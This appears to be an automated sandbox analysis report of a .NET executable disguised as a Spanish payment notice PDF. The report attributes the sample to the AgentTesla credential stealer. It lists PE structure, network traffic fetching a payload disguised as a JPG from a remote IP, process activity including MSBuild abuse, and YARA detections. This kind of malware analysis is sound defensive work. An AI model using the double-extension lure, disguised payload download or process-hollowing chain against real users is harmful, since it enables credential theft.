                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                  Instruction
                                  jmp dword ptr [00402000h]
add byte ptr [eax], al (this instruction, the decoding of two zero bytes, is repeated 97 times: the bytes after the entry-point jmp are zero padding)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x35ec | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0xbbb8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x35d0 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x1644 | 0x1800 | False | 0.529622395833 | data | 5.32361528176 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0xbbb8 | 0xbc00 | False | 0.582945478723 | data | 5.92398459334 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x4220 | 0x128 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x4358 | 0x2e8 | data | |
RT_ICON | 0x4650 | 0x668 | dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 0, next used block 0 | |
RT_ICON | 0x4cc8 | 0x568 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x5240 | 0x8a8 | data | |
RT_ICON | 0x5af8 | 0xea8 | data | |
RT_ICON | 0x69b0 | 0x468 | GLS_BINARY_LSB_FIRST | |
RT_ICON | 0x6e28 | 0x10a8 | data | |
RT_ICON | 0x7ee0 | 0x25a8 | data | |
RT_ICON | 0xa498 | 0x5190 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | |
RT_GROUP_ICON | 0xf638 | 0x92 | data | |
RT_VERSION | 0xf6dc | 0x2dc | data | |
RT_MANIFEST | 0xf9c8 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
LegalCopyright |
Assembly Version | 3.2.2.0
InternalName | Znmtganqo.exe
FileVersion | 3.2.2.0
CompanyName |
LegalTrademarks |
Comments |
ProductName |
ProductVersion | 3.2.2.0
FileDescription |
OriginalFilename | Znmtganqo.exe
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/13/22-17:18:49.165848 | TCP | 2848901 | ETPRO TROJAN Observed Reversed EXE String Inbound (This Program...) | 80 | 49763 | 195.133.18.171 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 13, 2022 17:18:58.378077030 CEST | 8.8.8.8 | 192.168.2.6 | 0x5a16 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)
May 13, 2022 17:19:05.113801956 CEST | 8.8.8.8 | 192.168.2.6 | 0x1684 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)
                                  • 195.133.18.171
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49763 | 195.133.18.171 | 80 | C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe
Timestamp | kBytes transferred | Direction | Data
May 13, 2022 17:18:48.827500105 CEST | 712 | OUT | GET /Znmtganqo_Wvetpunc.jpg HTTP/1.1
Host: 195.133.18.171
Connection: Keep-Alive
May 13, 2022 17:18:48.858424902 CEST | 713 | IN | HTTP/1.1 200 OK
Content-Type: image/jpeg
Last-Modified: Fri, 13 May 2022 13:56:45 GMT
Accept-Ranges: bytes
ETag: "8dce3a48d166d81:0"
Server: Microsoft-IIS/10.0
Date: Fri, 13 May 2022 15:18:48 GMT
Content-Length: 418304
                                  Data Ascii: 8p39403.8618.0.1noisreV ylbmessAF39403.8618.0.1noisreVtcudorPBemaNtcudorP"lld.sgktzsxbusvknrkNemaneliFlanigirORskramedarTlageL*thgirypoClageL&lld.sgktzsxbusvknrkNemaNlanretnIJ39403.8618.0.1noisre



                                  Target ID:0
                                  Start time:17:18:27
                                  Start date:13/05/2022
                                  Path:C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\Aviso de pago.pdf____________________________.exe"
                                  Imagebase:0x5d0000
                                  File size:55296 bytes
                                  MD5 hash:05B6B97166B339557424CA035418A640
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.480316793.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.480388373.00000000039D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:low

                                  Target ID:7
                                  Start time:17:19:01
                                  Start date:13/05/2022
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout 15
                                  Imagebase:0xed0000
                                  File size:232960 bytes
                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:8
                                  Start time:17:19:02
                                  Start date:13/05/2022
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff6406f0000
                                  File size:625664 bytes
                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:9
                                  Start time:17:19:02
                                  Start date:13/05/2022
                                  Path:C:\Windows\SysWOW64\timeout.exe
                                  Wow64 process (32bit):true
                                  Commandline:timeout 15
                                  Imagebase:0xd80000
                                  File size:26112 bytes
                                  MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  Target ID:12
                                  Start time:17:19:18
                                  Start date:13/05/2022
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                  Imagebase:0x880000
                                  File size:261728 bytes
                                  MD5 hash:D621FD77BD585874F9686D3A76462EF1
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.472348543.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.626727734.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000002.626727734.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.471775645.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.471775645.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.472717086.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.472717086.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000000.473012111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000C.00000000.473012111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 0000000C.00000002.627763645.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:high

                                  No disassembly